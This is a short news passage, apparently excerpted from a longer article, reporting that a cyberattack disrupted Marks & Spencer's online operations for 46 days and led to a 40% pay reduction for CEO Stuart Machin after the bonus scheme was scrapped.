The recent cyberattack on Marks & Spencer has added fuel to the discussion. The incident disrupted the retailer’s online operations for 46 days, and the company’s annual report revealed that CEO Stuart Machin took a 40% reduction in pay after the bonus scheme was scrapped because of the attack.